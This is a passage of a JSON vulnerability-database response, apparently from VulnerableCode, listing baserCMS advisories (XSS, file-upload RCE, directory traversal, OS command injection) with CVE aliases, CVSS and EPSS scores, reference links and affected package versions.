N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n
-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46998","GHSA-p3m2-mj3j-j49x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52930?format=json","vulnerability_id":"VCID-p6nr-eu91-53b4","summary":"Cross-site Scripting\nbaserCMS is affected by Cross Site Scripting (XSS) and Remote Code Execution (RCE). This may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The affected components are `ThemeFilesController.php` and `UploaderFilesController.php`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15159","reference_id":"","reference_type":"","scores":[{"value":"0.01563","scoring_system":"epss","scoring_elements":"0.8186","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01563","scoring_system":"epss","scoring_elements":"0.81826","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15159"},{"reference_url":"https://basercms.net/security/20200827","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20200827"},{"reference_url":"https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/
AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15159","reference_id":"CVE-2020-15159","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15159"},{"reference_url":"https://github.com/advisories/GHSA-673x-f5wx-fxpw","reference_id":"GHSA-673x-f5wx-fxpw","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-673x-f5wx-fxpw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/77910?format=json","purl":"pkg:composer/baserproject/basercms@4.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5y
gv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7"}],"aliases":["CVE-2020-15159","GHSA-673x-f5wx-fxpw"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p6nr-eu91-53b4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46312?format=json","vulnerability_id":"VCID-pd8c-9d7z-zkhg","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in 
baserproject/basercms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43647","reference_id":"","reference_type":"","scores":[{"value":"0.00572","scoring_system":"epss","scoring_elements":"0.69062","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43647"},{"reference_url":"https://basercms.net/security/JVN_24381990","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"}],"url":"https://basercms.net/security/JVN_24381990"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"}],"url":"https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43647
","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43647"},{"reference_url":"https://github.com/advisories/GHSA-ggj4-78rm-6xgv","reference_id":"GHSA-ggj4-78rm-6xgv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-ggj4-78rm-6xgv"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv","reference_id":"GHSA-ggj4-78rm-6xgv","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk
"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/67580?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"}],"aliases":["CVE-2023-43647","GHSA-ggj4-78rm-6xgv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56069?format=json","vulnerability_id":"VCID-sqr4-v889-tff8","summary":"baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature\nXSS vulnerability in Blog posts and Contents list Feature to 
baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46994","reference_id":"","reference_type":"","scores":[{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79112","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-46994"},{"reference_url":"https://basercms.net/security/JVN_00876083","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"}],"url":"https://basercms.net/security/JVN_00876083"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46994","reference_id":"CVE-2024-46994","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-46994"},{"reference_url":"https://github.com/advisories/GHSA-wrjc-fmfq-w3jr","reference_id":"GHSA-wrjc-fmfq-w3jr","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-wrjc-fmfq-w3jr"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr","reference_id":"GHSA-wrjc-fmfq-w3jr","reference_type":"","scores":[{"value":"5.
4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83045?format=json","purl":"pkg:composer/baserproject/basercms@5.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2"}],"aliases":["CVE-2024-46994","GHSA-wrjc-fmfq-w3jr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53745?format=json","vulnerability_id":"VCID-twf5-bzba-gqb4","summary":"Cross-site Scripting\nbaserCMS is vulnerable to Cross-Site Scripting. The issue affects the following components; Edit feed settings, Edit widget area, Sub site new registration, and New category registration. 
Arbitrary JavaScript may be executed by entering specific characters in the account that can access the file upload function category list, sub-site setting list, widget area edit, and feed list on the management screen.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15273","reference_id":"","reference_type":"","scores":[{"value":"0.00414","scoring_system":"epss","scoring_elements":"0.61981","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00414","scoring_system":"epss","scoring_elements":"0.61932","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15273"},{"reference_url":"https://github.com/baserproject/basercms/commit/b70474ef9dcee6ad8826360884625dc7ca9041a1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/b70474ef9dcee6ad8826360884625dc7ca9041a1"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wpww-4jf4-4hx8","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-wpww-4jf4-4hx8"},{"reference_url":"https://packagist.org/packages/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://packagist.org/packages/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15273","reference_id":"CVE-2020-15273","reference_type":"","scores":[{"
value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15273"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/79034?format=json","purl":"pkg:composer/baserproject/basercms@4.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.1"}],"aliases":["CVE-2020-15273","GHSA-wpww-4jf4-4hx8"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-twf5-bzba-gqb4"},{"url":"http://publi
c2.vulnerablecode.io/api/vulnerabilities/46308?format=json","vulnerability_id":"VCID-u16w-rbuk-ybfs","summary":"baserCMS Directory Traversal vulnerability in Form submission data management Feature\nThere is a Directory Traversal Vulnerability in Form submission data management Feature to baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.8 and earlier versions\n\n### Vulnerability\nThere is a possibility that information on the server may be obtained by a user who is logged in to the management screen.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_45547161\n\n### Credits\nShiga Takuma@BroadBand Security, Inc","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43648","reference_id":"","reference_type":"","scores":[{"value":"0.00289","scoring_system":"epss","scoring_elements":"0.52624","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43648"},{"reference_url":"https://basercms.net/security/JVN_81174674","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"}],"url":"https://basercms.net/security/JVN_81174674"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3
.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43648","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43648"},{"reference_url":"https://github.com/advisories/GHSA-hmqj-gv2m-hq55","reference_id":"GHSA-hmqj-gv2m-hq55","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-hmqj-gv2m-hq55"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55","reference_id":"GHSA-hmqj-gv2m-hq55","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/"}],"url":"https:
//github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/67580?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"}],"aliases":["CVE-2023-43648","GHSA-hmqj-gv2m-hq55"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u16
w-rbuk-ybfs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47096?format=json","vulnerability_id":"VCID-uedz-j2vn-cbea","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nbaserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-51450","reference_id":"","reference_type":"","scores":[{"value":"0.00755","scoring_system":"epss","scoring_elements":"0.73646","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-51450"},{"reference_url":"https://basercms.net/security/JVN_09767360","reference_id":"","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/"}],"url":"https://basercms.net/security/JVN_09767360"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c","reference_id":"","reference_type":"","scores":[{"value":"5.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/
